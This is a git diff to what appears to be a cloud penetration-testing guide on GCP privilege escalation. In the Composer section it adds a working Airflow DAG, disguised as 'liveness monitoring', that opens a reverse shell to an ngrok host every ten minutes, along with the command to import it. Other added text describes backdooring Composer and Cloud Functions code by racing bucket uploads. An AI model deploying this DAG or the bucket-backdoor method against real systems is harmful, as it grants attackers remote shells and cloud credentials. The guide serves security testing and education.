diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
index 488f1a3843..a947a4ba56 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
@@ -113,8 +113,6 @@ Not sure how to use these permissions or if they are useful (note that when you
Even with write access over the buckets where the source code is located **it WASN'T possible to execute arbitrary code by modifying the source code and the `manifest.json`**.\
Maybe if you are monitoring the bucket and detect the moment where a new version is created and the source code and manifest is uploaded, it might be possible to change them so the new version uses the backdoored ones??
-It also looks like container layers are stored in the bucket, maybe changing those?
{% hint style="success" %}
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diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
index ece6d2a146..c9a457e8ec 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
@@ -80,15 +80,61 @@ gcloud composer environments storage dags export --environment --l
### Import Dags
-Import Dags code to compromise the environment and be able to steal the token from the metadata endpoint:
+Add the python DAG code into a file and import it running:
{% code overflow="wrap" %}
# TODO: Create dag to get a rev shell
-gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/asd
+gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py
{% endcode %}
+Reverse shell DAG:
+{% code title="reverse_shell.py" %}
+import airflow
+from airflow import DAG
+from airflow.operators.bash_operator import BashOperator
+from datetime import timedelta
+default_args = {
+ 'start_date': airflow.utils.dates.days_ago(0),
+ 'retries': 1,
+ 'retry_delay': timedelta(minutes=5)
+dag = DAG(
+ 'reverse_shell',
+ default_args=default_args,
+ description='liveness monitoring dag',
+ schedule_interval='*/10 * * * *',
+ max_active_runs=1,
+ catchup=False,
+ dagrun_timeout=timedelta(minutes=10),
+# priority_weight has type int in Airflow DB, uses the maximum.
+t1 = BashOperator(
+ task_id='bash_rev',
+ bash_command='bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1',
+ dag=dag,
+ depends_on_past=False,
+ priority_weight=2**31 - 1,
+ do_xcom_push=False)
+{% endcode %}
+### Write Access to the Composer bucket
+All the components of a composer environments (DAGs, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version.
+Get more info about this attack in:
+{% content-ref url="gcp-storage-privesc.md" %}
+{% endcontent-ref %}
### Import Plugins
TODO: Check what is possible to compromise by uploading plugins
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
index 8924e04782..7a288db0c0 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
@@ -91,14 +91,15 @@ A very **common exploitation** of buckets where you can write in cloud is in cas
**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features:
* It runs inside a **GKE cluster**, so the **SA the cluster uses is accessible** by the code running inside Composer
-* It stores the **code in a bucket**, therefore, **anyone with write access over that bucket** is going to be able to change/add a DGA code (the code Apache Airflow will execute)\
- Then, if you have **write access over the bucket Composer is using** to store the code, you can **privesc to the SA running in the GKE cluster**.
+* All the components of a composer environments (**code of DAGs**, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version.
+**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs**](https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs)
### Cloud Functions
* Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, **overwriting the code before the new version gets built it's possible to make the cloud function execute arbitrary code**.
-You can find a PoC of this attack in the repo: [https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions](https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions)
+**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions**](https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions)
### App Engine
@@ -110,6 +111,10 @@ You can find a PoC of this attack in the repo: [https://github.com/carlospolop/M
* **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.**
* The bucket used by GCR will have an URL similar to `gs://.artifacts..appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
+{% hint style="success" %}
+This service is deprecated so this attack is no longer useful. Moreover, Artifactory, the service that substitutes this one, does't store the images in buckets.
+{% endhint %}
## **References**
* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)